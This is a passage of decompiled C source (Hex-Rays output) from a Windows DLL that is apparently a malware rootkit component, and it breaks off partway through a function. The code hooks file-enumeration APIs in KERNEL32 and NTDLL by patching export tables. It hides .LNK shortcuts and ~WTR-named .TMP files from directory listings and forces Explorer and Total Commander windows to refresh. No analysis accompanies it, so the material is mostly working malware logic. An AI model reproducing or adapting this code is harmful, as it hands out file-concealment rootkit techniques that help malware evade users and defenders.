/* This file has been generated by the Hex-Rays decompiler. Copyright (c) 2009 Hex-Rays Detected compiler: Visual C++ */ #include #include //------------------------------------------------------------------------- // Data declarations extern int dword_100037B0[8]; // weak extern char *off_100037D2; // weak extern char byte_100037D9[3]; // weak extern char byte_100038A7; // weak extern int dword_10003C3A; // weak extern int dword_10003C42; // weak extern int dword_10003C46; // weak extern int dword_10003C4A; // weak extern int dword_10003C4E; // weak extern int dword_10003C52; // weak extern int (__stdcall *dword_10003C56)(_DWORD); // weak extern int dword_10003C5A; // weak extern int dword_10003C5E; // weak extern int dword_10003C62; // weak extern int (__stdcall *dword_10003C66)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); // weak extern int (__stdcall *dword_10003C6A)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); // weak extern int dword_10003C6E; // weak extern int dword_10003C72; // weak extern int dword_10003C76; // weak extern int (__stdcall *dword_10003C7A)(_DWORD); // weak extern _UNKNOWN unk_100050E0; // weak extern _UNKNOWN unk_10005110; // weak extern _UNKNOWN unk_10005124; // weak extern _UNKNOWN unk_10005140; // weak extern _UNKNOWN unk_10005160; // weak extern _UNKNOWN unk_10005180; // weak extern _UNKNOWN unk_1000519C; // weak extern _UNKNOWN unk_100051BC; // weak extern _UNKNOWN unk_100051E8; // weak extern _UNKNOWN unk_10005204; // weak extern _UNKNOWN unk_1000521C; // weak extern _UNKNOWN unk_1000523C; // weak extern _UNKNOWN unk_10005264; // weak extern _UNKNOWN unk_10005280; // weak extern _UNKNOWN unk_100052A8; // weak extern _UNKNOWN unk_100052CC; // weak extern _UNKNOWN unk_10005328; // weak extern _UNKNOWN unk_10005344; // weak extern char ProcName[]; // idb extern const WCHAR ModuleName[]; // idb extern wchar_t a_lnk[5]; // weak extern wchar_t a_tmp[5]; // weak extern wchar_t aWtr[5]; // weak 
extern char aFindfirstfilew[15]; // weak extern char aKernel32_dll_0[13]; // weak extern char aFindnextfilew[14]; // weak extern char aFindfirstfilee[17]; // weak extern char aNtquerydirecto[21]; // weak extern char aNtdll_dll_0[10]; // weak extern char aZwquerydirecto[21]; // weak extern const WCHAR word_10005428; // idb extern const WCHAR String2[]; // idb extern const WCHAR aWincmd_exe[]; // idb extern const WCHAR aProgman[]; // idb extern const WCHAR aSyslistview32[]; // idb extern const WCHAR aDirectuihwnd[]; // idb extern const WCHAR String[]; // idb extern wchar_t aShell32_dll_as[18]; // weak extern const WCHAR aS08x[]; // idb extern const WCHAR a08x08x08x08x[]; // idb extern const WCHAR Name[]; // idb extern const WCHAR aCopyOf[]; // idb extern const WCHAR aCopyOfShortcut[]; // idb extern const WCHAR aWtr4141_tmp[]; // idb extern _UNKNOWN unk_100055D8; // weak extern _UNKNOWN unk_100055E8; // weak extern _UNKNOWN unk_100055F8; // weak extern _UNKNOWN unk_10005608; // weak extern _UNKNOWN unk_10005618; // weak extern _DWORD dword_10006000[4]; // idb extern int dword_10006010; // weak extern int dword_10006020; // weak extern int dword_10006028; // weak extern _DWORD dword_1000602C; // idb extern _UNKNOWN unk_10006030; // weak extern int dword_10006038; // weak extern int dword_1000603C; // weak extern int dword_10006040[]; // weak extern int dword_10006044; // weak extern int dword_10006048; // weak extern int (__stdcall *dword_10006178)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); // weak extern int (__stdcall *dword_1000617C)(_DWORD, _DWORD); // weak extern int (__stdcall *dword_10006180)(_DWORD, _DWORD); // weak extern int (__stdcall *dword_10006184)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); // weak extern int dword_10006188; // weak extern HMODULE hModule; // idb //------------------------------------------------------------------------- // Function declarations #define __thiscall __cdecl // Test compile 
in C mode // BOOL __userpurge sub_10001000(int a1, int a2, int a3, void *a4); // char __userpurge sub_10001090(int a1, unsigned int a2, int a3, int a4, int a5); // char __userpurge sub_10001230(signed int a1, int a2, unsigned int a3, int a4); // char __userpurge sub_100012A0(int a1, int a2, unsigned int a3, int a4); // char __usercall sub_10001340(int a1, int a2, int a3); // char __usercall sub_10001390(int a1, int a2, int a3, int a4); BOOL __cdecl sub_10001430(); int __stdcall sub_100014C0(int a1, int a2, int a3, int a4, int a5, unsigned int a6, int a7, int a8, int a9, int a10, int a11); signed int __stdcall sub_10001580(int a1, int a2); signed int __stdcall sub_10001600(int a1, int a2); int __stdcall sub_10001700(int a1, int a2, int a3, int a4, int a5, int a6); BOOL __cdecl sub_10001790(); signed int __stdcall EnumFunc(HWND hWnd, int a2); // __int32 __userpurge sub_10001850(__int32 result, int a2); signed int __stdcall sub_100018F0(HWND a1, int a2); // void *__usercall sub_10001910(HWND a1); // HMODULE __userpurge sub_100019A0(const CHAR *a1, DWORD a2, int a3, int a4); // BOOL __userpurge sub_10001A50(int a1, LPCSTR flOldProtect, int a3); // signed int __userpurge sub_10001B20(int a1, DWORD lpString1, LPCSTR lpString2, int a4); // signed int __userpurge sub_10001C40(DWORD a1, int a2, LPCSTR lpString1, LPCSTR lpString2, int a5); // WCHAR *__usercall sub_10001D00(const WCHAR *a1); // signed int __usercall sub_10001D90(const WCHAR *a1, DWORD a2, LPVOID *a3, DWORD *a4); BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved); signed int __cdecl sub_10001EA7(); // int __userpurge sub_10001EAD(int a1, int a2, int a3, int a4); DWORD __cdecl sub_10001ED0(); // signed int __usercall sub_10001F80(const WCHAR *a1); bool __stdcall sub_10001FD0(LPCWSTR lpFileName, int a2); HANDLE __cdecl sub_100020A0(); HANDLE __cdecl sub_10002130(); HRESULT __stdcall DllGetClassObject(const IID *const rclsid, const IID *const riid, LPVOID *ppv); // int 
__userpurge StartAddress(int a1, LPCWSTR lpFileName); // void __usercall sub_10002340(LPCWSTR lpFileName, int a2); void __stdcall sub_100023D0(LPCWSTR lpFileName); // bool __userpurge sub_10002460(int a1, LPCWSTR lpFileName); // bool __userpurge sub_100024B0(DWORD a1, DWORD a2, void *a3, const void *a4); bool __thiscall sub_100024F0(void *this); // void __usercall sub_100025B0(const WCHAR *a1); int __cdecl sub_100027B0(int a1); int __cdecl loc_100027C8(int); // weak signed int __cdecl sub_100027D0(int a1, int a2, int a3, int a4); // int __usercall sub_100027F2(int a1, int a2, int a3); // int __userpurge sub_10002886(int result, int a2, int a3); // signed int __usercall sub_100028A8(int a1); void *__cdecl sub_10002D70(void *a1, unsigned __int8 a2, unsigned int a3); // DWORD __stdcall GetModuleBaseNameW(HANDLE hProcess, HMODULE hModule, LPWSTR lpBaseName, DWORD nSize); // BOOL __stdcall EnumProcessModules(HANDLE hProcess, HMODULE *lphModule, DWORD cb, LPDWORD lpcbNeeded); signed int __thiscall sub_10002DD4(DWORD this); signed int __cdecl sub_10002F0F(int a1, int a2, int a3, int a4, int a5); int __cdecl sub_10002FBF(void **a1, int a2, int a3, int a4, const void *a5, unsigned int a6); int __cdecl sub_1000300D(int, LPCWSTR lpString2); // idb int __cdecl sub_100030C2(int a1, const void *a2, const void *a3, unsigned int a4, int a5, const void *a6, unsigned int a7, int a8); signed int __cdecl sub_1000320E(int a1, int a2, const void *a3); unsigned int __cdecl sub_10003327(); signed int (__cdecl *__cdecl sub_10003336())(int); unsigned int __cdecl sub_10003340(); unsigned int __cdecl sub_1000334F(); int __cdecl sub_1000335E(int a1, int a2, int a3, int a4); int __cdecl sub_100034D2(LPCWSTR lpString2, const void *a2, unsigned int a3, int a4); int __cdecl sub_100035ED(LPCWSTR lpFileName, HANDLE hObject, int); // idb int __cdecl sub_1000368F(LPVOID lpAddress); // idb int __cdecl sub_100036A8(int a1, int a2); __int16 __cdecl sub_100036CB(int a1, int a2); HMODULE __cdecl 
sub_10003708(); FARPROC __cdecl sub_10003733(int a1, int a2); void __cdecl sub_10003774(void *a1, const void *a2, unsigned int a3); FARPROC __cdecl sub_10003788(int a1); FARPROC __cdecl sub_10003799(int a1); void __fastcall sub_10003ACF(int a1, int a2); void __cdecl sub_10003B11(); // int __usercall sub_10003B64(int a1, int a2, int a3); // int __stdcall RtlUnwind(_DWORD, _DWORD, _DWORD, _DWORD); weak signed int __cdecl sub_10003C84(int a1); int __stdcall sub_10003E22(int a1); int __cdecl sub_10003E95(int a1, int a2, int a3); signed int __stdcall sub_10003F58(int a1); void __cdecl sub_100040B7(void *a1, const void *a2, unsigned int a3); int __cdecl sub_100040CB(const void *a1, int a2, void *a3); signed int __cdecl sub_1000414D(int a1, int a2); signed int __cdecl sub_100041EB(int a1, int a2, const void *a3, int a4); void __cdecl sub_100042CC(); // DWORD __stdcall GetFileSize(HANDLE hFile, LPDWORD lpFileSizeHigh); // BOOL __stdcall GetFileAttributesExW(LPCWSTR lpFileName, GET_FILEEX_INFO_LEVELS fInfoLevelId, LPVOID lpFileInformation); // HMODULE __stdcall GetModuleHandleW(LPCWSTR lpModuleName); // BOOL __stdcall SetFileTime(HANDLE hFile, const FILETIME *lpCreationTime, const FILETIME *lpLastAccessTime, const FILETIME *lpLastWriteTime); // BOOL __stdcall WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped); // DWORD __stdcall GetFileAttributesW(LPCWSTR lpFileName); // HANDLE __stdcall CreateFileW(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); // int __stdcall lstrlenW(LPCWSTR lpString); // FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName); // BOOL __stdcall CloseHandle(HANDLE hObject); // BOOL __stdcall DeleteFileW(LPCWSTR lpFileName); // LPWSTR __stdcall lstrcpyW(LPWSTR lpString1, LPCWSTR lpString2); // BOOL __stdcall 
SetFileAttributesW(LPCWSTR lpFileName, DWORD dwFileAttributes); // HANDLE __stdcall GetCurrentProcess(); // void __stdcall SetLastError(DWORD dwErrCode); // int __stdcall lstrcmpiW(LPCWSTR lpString1, LPCWSTR lpString2); // DWORD __stdcall GetCurrentThreadId(); // DWORD __stdcall GetCurrentProcessId(); // int __stdcall lstrcmpA(LPCSTR lpString1, LPCSTR lpString2); // BOOL __stdcall IsBadReadPtr(const void *lp, UINT_PTR ucb); // DWORD __stdcall GetModuleFileNameW(HMODULE hModule, LPWCH lpFilename, DWORD nSize); // int __stdcall lstrcmpiA(LPCSTR lpString1, LPCSTR lpString2); // HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName); // BOOL __stdcall VirtualProtect(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect); // LPWSTR __stdcall lstrcatW(LPWSTR lpString1, LPCWSTR lpString2); // BOOL __stdcall VirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType); // LPWSTR __stdcall lstrcpynW(LPWSTR lpString1, LPCWSTR lpString2, int iMaxLength); // BOOL __stdcall ReadFile(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped); // LPVOID __stdcall VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); // HANDLE __stdcall CreateMutexW(LPSECURITY_ATTRIBUTES lpMutexAttributes, BOOL bInitialOwner, LPCWSTR lpName); // UINT __stdcall SetErrorMode(UINT uMode); // BOOL __stdcall FreeLibrary(HMODULE hLibModule); // LPVOID __stdcall HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes); // DWORD __stdcall WaitForSingleObject(HANDLE hHandle, DWORD dwMilliseconds); // DWORD __stdcall GetTickCount(); // HANDLE __stdcall GetProcessHeap(); // void __stdcall Sleep(DWORD dwMilliseconds); // DWORD __stdcall GetLastError(); // BOOL __stdcall DisableThreadLibraryCalls(HMODULE hLibModule); // BOOL __stdcall ReleaseMutex(HANDLE hMutex); // HANDLE __stdcall CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, 
LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId); // DWORD __stdcall SetFilePointer(HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod); // DWORD __stdcall GetWindowThreadProcessId(HWND hWnd, LPDWORD lpdwProcessId); // LRESULT __stdcall SendMessageW(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam); // BOOL __stdcall IsWindowVisible(HWND hWnd); // BOOL __stdcall EnumChildWindows(HWND hWndParent, WNDENUMPROC lpEnumFunc, LPARAM lParam); // int __stdcall GetClassNameW(HWND hWnd, LPWSTR lpClassName, int nMaxCount); // BOOL __stdcall EnumWindows(WNDENUMPROC lpEnumFunc, LPARAM lParam); // BOOL __stdcall PostMessageW(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam); // int wsprintfW(LPWSTR, LPCWSTR, ...); //----- (10001000) -------------------------------------------------------- BOOL __userpurge sub_10001000(int a1, int a2, int a3, void *a4) { FARPROC v4; // eax@1 HMODULE v5; // eax@1 BOOL result; // eax@2 int v7; // edx@2 int v8; // ecx@2 int v9; // edx@2 int v10; // ecx@2 int v11; // edx@2 char v12; // [sp+0h] [bp-30h]@2 int v13; // [sp+8h] [bp-28h]@2 int v14; // [sp+Ch] [bp-24h]@2 int v15; // [sp+10h] [bp-20h]@2 int v16; // [sp+14h] [bp-1Ch]@2 int v17; // [sp+18h] [bp-18h]@2 int v18; // [sp+1Ch] [bp-14h]@2 int v19; // [sp+20h] [bp-10h]@2 int v20; // [sp+24h] [bp-Ch]@2 int v21; // [sp+28h] [bp-8h]@2 v5 = GetModuleHandleW(L"NTDLL.DLL"); v4 = GetProcAddress(v5, "ZwSetInformationFile"); if ( !v4 || (v7 = *(_DWORD *)(a1 + 4), v13 = *(_DWORD *)a1, v8 = *(_DWORD *)a2, v14 = v7, v9 = *(_DWORD *)(a2 + 4), v15 = v8, v10 = *(_DWORD *)a3, v16 = v9, v11 = *(_DWORD *)(a3 + 4), v17 = v10, v19 = v10, v18 = v11, v20 = v11, v21 = 128, (result = ((int (__stdcall *)(void *, char *, int *, signed int, signed int))v4)(a4, &v12, &v13, 40, 4)) != 0) ) result = SetFileTime(a4, (const FILETIME *)a1, (const FILETIME *)a2, (const FILETIME *)a3); return result; } //----- (10001090) -------------------------------------------------------- char 
__userpurge sub_10001090(int a1, unsigned int a2, int a3, int a4, int a5) { unsigned int v5; // ebp@1 int v7; // ebx@3 signed int v8; // eax@6 signed int v9; // edi@7 signed int v10; // eax@11 int v11; // ecx@11 int v12; // esi@13 int v13; // edx@15 int v14; // eax@22 int v15; // ecx@22 int v16; // edx@23 int v17; // ecx@24 int v18; // esi@24 int v19; // [sp+18h] [bp-14h]@1 unsigned int v20; // [sp+1Ch] [bp-10h]@1 unsigned int v21; // [sp+24h] [bp-8h]@4 int v22; // [sp+28h] [bp-4h]@4 char v23; // [sp+30h] [bp+4h]@1 v5 = a2; v19 = a1; v23 = 0; v20 = 0; if ( !a1 ) return 1; while ( 1 ) { v7 = *(_DWORD *)v5; if ( a3 == -1 ) { v21 = -1; v22 = -1; } else { v21 = *(_DWORD *)(a3 + v5); v22 = *(_DWORD *)(v5 + 4 + a3); } v8 = *(_DWORD *)(a5 + v5); if ( !(v8 & 1) ) { v9 = v8 / 2; if ( ((v22 & v21) == -1 || !v22 && v21 == 4171) && v9 > 4 ) { v11 = (int)L".LNK"; v10 = 4; while ( v10 ) { v12 = *(_WORD *)v11; if ( (unsigned int)(v12 - 97) <= 0x19 ) v12 -= 32; v13 = *(_WORD *)(a4 + v5 + 2 * v9 - 8 - (_DWORD)L".LNK" + v11); if ( (unsigned int)(v13 - 97) <= 0x19 ) v13 -= 32; v7 = *(_DWORD *)v5; if ( v12 != v13 ) break; v11 += 2; --v10; if ( !*(_WORD *)v11 ) goto LABEL_21; } } if ( sub_100012A0(a4 + v5, v9, v21, v22) ) break; } v20 = v5; v23 = 1; v5 += v7; LABEL_31: v19 -= v7; if ( !v7 ) return v23 != 0; } LABEL_21: if ( v7 ) { v15 = v7 + v5; v14 = v19 - v7; if ( v5 <= v7 + v5 || (v16 = v14 + v15, v5 >= v14 + v15) ) { if ( v19 != v7 ) { do { --v14; *(_BYTE *)(v15 - v7) = *(_BYTE *)v15; ++v15; } while ( v14 ); } } else { v17 = v5 - 1 + v14; v18 = v16 - 1; if ( v19 != v7 ) { do { --v14; *(_BYTE *)v17-- = *(_BYTE *)v18--; } while ( v14 ); } } goto LABEL_31; } if ( v20 ) *(_DWORD *)v20 = 0; return v23 != 0; } // 10005384: using guessed type wchar_t a_lnk[5]; //----- (10001230) -------------------------------------------------------- char __userpurge sub_10001230(signed int a1, int a2, unsigned int a3, int a4) { int v4; // edi@1 char result; // al@2 signed int v6; // esi@3 v4 = a2; if ( 
a1 & 1 ) { result = 0; } else { v6 = a1 / 2; if ( (a4 & a3) != -1 && (a4 || a3 != 4171) || v6 <= 4 || !sub_10001340(4, a2 + 2 * v6 - 8, (int)L".LNK") ) result = sub_100012A0(v4, v6, a3, a4) != 0; else result = 1; } return result; } // 10005384: using guessed type wchar_t a_lnk[5]; //----- (100012A0) -------------------------------------------------------- char __userpurge sub_100012A0(int a1, int a2, unsigned int a3, int a4) { int v4; // esi@1 signed int v6; // ecx@9 unsigned __int16 v7; // ax@10 v4 = 0; if ( ((a4 & a3) == -1 || !a4 && a3 >= 0x1000 && a3 <= 0x800000) && a2 == 12 && sub_10001340(4, a1 + 16, (int)L".TMP") && sub_10001340(12, a1, (int)L"~WTR") ) { v6 = 4; while ( 1 ) { v7 = *(_WORD *)(a1 + 2 * v6); if ( v7 < 0x30u ) break; if ( v7 > 0x39u ) break; ++v6; v4 = (v7 + v4 - 48) % 10; if ( v6 > 7 ) return v4 == 0; } } return 0; } // 10005390: using guessed type wchar_t a_tmp[5]; // 1000539C: using guessed type wchar_t aWtr[5]; //----- (10001340) -------------------------------------------------------- char __usercall sub_10001340(int a1, int a2, int a3) { unsigned __int16 v3; // ax@1 int v4; // edi@1 int v5; // esi@1 int v6; // edx@3 int v7; // eax@5 char result; // al@9 v4 = a1; v3 = *(_WORD *)a3; v5 = a2; if ( *(_WORD *)a3 ) { while ( v4 ) { v6 = v3; if ( (unsigned int)v3 - 97 <= 0x19 ) v6 = v3 - 32; v7 = *(_WORD *)v5; if ( (unsigned int)(v7 - 97) <= 0x19 ) v7 -= 32; if ( v6 != v7 ) break; v3 = *(_WORD *)(a3 + 2); a3 += 2; v5 += 2; --v4; if ( !v3 ) goto LABEL_9; } result = 0; } else { LABEL_9: result = 1; } return result; } //----- (10001390) -------------------------------------------------------- char __usercall sub_10001390(int a1, int a2, int a3, int a4) { char result; // al@2 switch ( a4 ) { case 3: *(_DWORD *)a1 = 60; *(_DWORD *)a2 = 40; *(_DWORD *)a3 = 94; result = 1; break; case 1: *(_DWORD *)a1 = 60; *(_DWORD *)a2 = 40; *(_DWORD *)a3 = 64; result = 1; break; case 2: *(_DWORD *)a1 = 60; *(_DWORD *)a2 = 40; *(_DWORD *)a3 = 68; result = 1; break; 
case 37: *(_DWORD *)a1 = 60; *(_DWORD *)a2 = 40; *(_DWORD *)a3 = 104; result = 1; break; case 38: *(_DWORD *)a1 = 60; *(_DWORD *)a2 = 40; *(_DWORD *)a3 = 80; result = 1; break; case 12: *(_DWORD *)a1 = 8; *(_DWORD *)a2 = -1; *(_DWORD *)a3 = 12; result = 1; break; default: result = 0; break; } return result; } //----- (10001430) -------------------------------------------------------- BOOL __cdecl sub_10001430() { sub_100019A0("FindFirstFileW", (DWORD)"KERNEL32.DLL", (int)sub_10001580, (int)&dword_1000617C); sub_100019A0("FindNextFileW", (DWORD)"KERNEL32.DLL", (int)sub_10001600, (int)&dword_10006180); sub_100019A0("FindFirstFileExW", (DWORD)"KERNEL32.DLL", (int)sub_10001700, (int)&dword_10006184); sub_100019A0("NtQueryDirectoryFile", (DWORD)"NTDLL.DLL", (int)sub_100014C0, (int)&dword_10006178); sub_100019A0("ZwQueryDirectoryFile", (DWORD)"NTDLL.DLL", (int)sub_100014C0, (int)&dword_10006178); return sub_10001790(); } // 10006178: using guessed type int (__stdcall *dword_10006178)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); // 1000617C: using guessed type int (__stdcall *dword_1000617C)(_DWORD, _DWORD); // 10006180: using guessed type int (__stdcall *dword_10006180)(_DWORD, _DWORD); // 10006184: using guessed type int (__stdcall *dword_10006184)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); //----- (100014C0) -------------------------------------------------------- int __stdcall sub_100014C0(int a1, int a2, int a3, int a4, int a5, unsigned int a6, int a7, int a8, int a9, int a10, int a11) { int result; // eax@2 unsigned __int8 v12; // sf@8 unsigned __int8 v13; // of@8 int v14; // [sp+2Ch] [bp-10h]@3 int v15; // [sp+30h] [bp-Ch]@6 int v16; // [sp+34h] [bp-8h]@6 int v17; // [sp+38h] [bp-4h]@6 if ( dword_10006178 ) { v14 = 0; while ( 1 ) { result = dword_10006178(a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11); if ( result ) break; if ( !a6 ) break; if ( !sub_10001390((int)&v15, (int)&v17, (int)&v16, a8) || sub_10001090(a7, 
a6, v17, v16, v15) ) return 0; LOBYTE(a11) = 0; v13 = __SETO__(v14 + 1, 10); v12 = v14++ - 9 < 0; if ( !(v12 ^ v13) ) return -1073741809; } } else { result = -1073741801; } return result; } // 10006178: using guessed type int (__stdcall *dword_10006178)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); //----- (10001580) -------------------------------------------------------- signed int __stdcall sub_10001580(int a1, int a2) { int v2; // ebx@2 int v3; // ST08_4@3 unsigned int v4; // ST04_4@3 int v5; // eax@3 if ( !dword_1000617C || (v2 = dword_1000617C(a1, a2), v2 == -1) ) return -1; v3 = *(_DWORD *)(a2 + 28); v4 = *(_DWORD *)(a2 + 32); v5 = lstrlenW((LPCWSTR)(a2 + 44)); if ( sub_10001230(2 * v5, a2 + 44, v4, v3) && !sub_10001600(v2, a2) ) { SetLastError(2u); CloseHandle((HANDLE)v2); return -1; } return v2; } // 1000617C: using guessed type int (__stdcall *dword_1000617C)(_DWORD, _DWORD); //----- (10001600) -------------------------------------------------------- signed int __stdcall sub_10001600(int a1, int a2) { int v3; // esi@3 signed int v4; // eax@5 signed int v5; // edi@6 signed int v6; // eax@10 int v7; // ecx@10 int v8; // esi@12 int v9; // edx@14 char v10; // zf@16 int v11; // [sp+Ch] [bp-Ch]@10 unsigned int v12; // [sp+10h] [bp-8h]@5 int v13; // [sp+14h] [bp-4h]@5 if ( dword_10006180 ) { v3 = a2; LABEL_4: while ( dword_10006180(a1, v3) ) { v12 = *(_DWORD *)(v3 + 32); v13 = *(_DWORD *)(v3 + 28); v4 = 2 * lstrlenW((LPCWSTR)(v3 + 44)); if ( !(v4 & 1) ) { v5 = v4 / 2; if ( ((v13 & v12) == -1 || !v13 && v12 == 4171) && v5 > 4 ) { v7 = (int)L".LNK"; v6 = 4; v11 = v3 + 44 + 2 * v5 - 8 - (_DWORD)L".LNK"; while ( v6 ) { v8 = *(_WORD *)v7; if ( (unsigned int)(v8 - 97) <= 0x19 ) v8 -= 32; v9 = *(_WORD *)(v11 + v7); if ( (unsigned int)(v9 - 97) <= 0x19 ) v9 -= 32; v10 = v8 == v9; v3 = a2; if ( !v10 ) break; v7 += 2; --v6; if ( !*(_WORD *)v7 ) goto LABEL_4; } } if ( sub_100012A0(v3 + 44, v5, v12, v13) ) continue; } return 1; } } 
return 0; } // 10005384: using guessed type wchar_t a_lnk[5]; // 10006180: using guessed type int (__stdcall *dword_10006180)(_DWORD, _DWORD); //----- (10001700) -------------------------------------------------------- int __stdcall sub_10001700(int a1, int a2, int a3, int a4, int a5, int a6) { int result; // eax@2 int v7; // edi@2 int v8; // ST14_4@4 unsigned int v9; // ST10_4@4 int v10; // eax@4 if ( !dword_10006184 || (result = dword_10006184(a1, a2, a3, a4, a5, a6), v7 = result, result == -1) ) return -1; if ( a2 ) return result; v8 = *(_DWORD *)(a3 + 28); v9 = *(_DWORD *)(a3 + 32); v10 = lstrlenW((LPCWSTR)(a3 + 44)); if ( sub_10001230(2 * v10, a3 + 44, v9, v8) && !sub_10001600(v7, a3) ) { SetLastError(2u); CloseHandle((HANDLE)v7); return -1; } return v7; } // 10006184: using guessed type int (__stdcall *dword_10006184)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); //----- (10001790) -------------------------------------------------------- BOOL __cdecl sub_10001790() { LPARAM v0; // esi@1 HANDLE v1; // eax@1 WCHAR String1; // [sp+8h] [bp-208h]@1 char v4; // [sp+Ah] [bp-206h]@1 String1 = 0; sub_10002D70(&v4, 0, 0x206u); v0 = 0; v1 = GetCurrentProcess(); GetModuleBaseNameW(v1, 0, &String1, 0x104u); if ( !lstrcmpiW(&String1, L"totalcmd.exe") || !lstrcmpiW(&String1, L"wincmd.exe") ) v0 = 1; return EnumWindows((WNDENUMPROC)EnumFunc, v0); } //----- (10001810) -------------------------------------------------------- signed int __stdcall EnumFunc(HWND hWnd, int a2) { DWORD dwProcessId; // [sp+0h] [bp-4h]@1 dwProcessId = 0; GetWindowThreadProcessId(hWnd, &dwProcessId); if ( dwProcessId == GetCurrentProcessId() ) sub_10001850((__int32)hWnd, a2); return 1; } //----- (10001850) -------------------------------------------------------- __int32 __userpurge sub_10001850(__int32 result, int a2) { LPARAM v2; // esi@1 DWORD v3; // eax@6 DWORD v4; // eax@6 WCHAR String1; // [sp+4h] [bp-208h]@4 v2 = result; if ( result ) { result = IsWindowVisible((HWND)result); if ( result ) { 
if ( a2 ) { v3 = GetCurrentThreadId(); SendMessageW((HWND)v2, 28u, 0, v3); v4 = GetCurrentThreadId(); SendMessageW((HWND)v2, 0x1Cu, 1u, v4); result = SendMessageW((HWND)v2, 6u, 2u, v2); } else { GetClassNameW((HWND)v2, &String1, 260); result = lstrcmpiW(&String1, L"Progman"); if ( result ) { sub_10001910((HWND)v2); result = EnumChildWindows((HWND)v2, (WNDENUMPROC)sub_100018F0, 0); } } } } return result; } //----- (100018F0) -------------------------------------------------------- signed int __stdcall sub_100018F0(HWND a1, int a2) { sub_10001910(a1); return 1; } //----- (10001910) -------------------------------------------------------- void *__usercall sub_10001910(HWND a1) { void *result; // eax@1 WCHAR String1; // [sp+0h] [bp-208h]@1 char v3; // [sp+2h] [bp-206h]@1 String1 = 0; result = sub_10002D70(&v3, 0, 0x206u); if ( a1 ) { result = (void *)IsWindowVisible(a1); if ( result ) { GetClassNameW(a1, &String1, 260); if ( !lstrcmpiW(&String1, L"SysListView32") || (result = (void *)lstrcmpiW(&String1, L"DirectUIHWND"), !result) ) { PostMessageW(a1, 256u, 116u, 0); result = (void *)PostMessageW(a1, 0x101u, 0x74u, 0); } } } return result; } //----- (100019A0) -------------------------------------------------------- HMODULE __userpurge sub_100019A0(const CHAR *a1, DWORD a2, int a3, int a4) { HMODULE result; // eax@2 int v5; // esi@3 FARPROC v6; // eax@5 int v7; // ebx@5 int v8; // eax@8 int v9; // ecx@8 int v10; // eax@8 if ( dword_10006188 < 16 ) { result = GetModuleHandleA((LPCSTR)a2); v5 = (int)result; if ( result ) { v6 = GetProcAddress(result, a1); v7 = (int)v6; if ( v6 && v6 != (FARPROC)a3 ) { v8 = sub_10001A50(v5, a1, a3); sub_10001B20(v8, a2, a1, a3); v9 = dword_10006188; v10 = 20 * dword_10006188; dword_10006040[5 * dword_10006188] = v5; *(int *)((char *)&dword_10006048 + v10) = a3; *(int *)((char *)&dword_10006044 + v10) = v7; *(int *)((char *)&dword_10006038 + v10) = a2; *(int *)((char *)&dword_1000603C + v10) = (int)a1; *(_DWORD *)a4 = v7; dword_10006188 = 
v9 + 1; result = (HMODULE)1; } else { result = 0; } } } else { result = 0; } return result; } // 10006038: using guessed type int dword_10006038; // 1000603C: using guessed type int dword_1000603C; // 10006040: using guessed type int dword_10006040[]; // 10006044: using guessed type int dword_10006044; // 10006048: using guessed type int dword_10006048; // 10006188: using guessed type int dword_10006188; //----- (10001A50) -------------------------------------------------------- BOOL __userpurge sub_10001A50(int a1, LPCSTR flOldProtect, int a3) { BOOL result; // eax@2 int v4; // eax@3 int v5; // ebx@4 unsigned int v6; // ebp@4 int v7; // edi@6 void *v8; // edi@9 int v9; // [sp+0h] [bp-Ch]@5 unsigned int v10; // [sp+4h] [bp-8h]@4 int v11; // [sp+8h] [bp-4h]@4 if ( *(_WORD *)a1 != 23117 || (v4 = *(_DWORD *)(*(_DWORD *)(a1 + 60) + a1 + 120), !v4) ) return 0; v11 = a1 + *(_DWORD *)(v4 + a1 + 28); v5 = a1 + *(_DWORD *)(v4 + a1 + 32); v6 = 0; v10 = *(_DWORD *)(v4 + a1 + 24); if ( !v10 ) goto LABEL_12; v9 = v4 + a1 + 36; while ( 1 ) { v7 = a1 + *(_DWORD *)v9; if ( !lstrcmpA((LPCSTR)(a1 + *(_DWORD *)v5), flOldProtect) ) break; ++v6; v5 += 4; if ( v6 >= v10 ) return 1; } v8 = (void *)(v11 + 4 * *(_WORD *)(v7 + 2 * v6)); result = VirtualProtect(v8, 4u, 0x80u, (PDWORD)&flOldProtect); if ( result ) { *(_DWORD *)v8 = a3 - 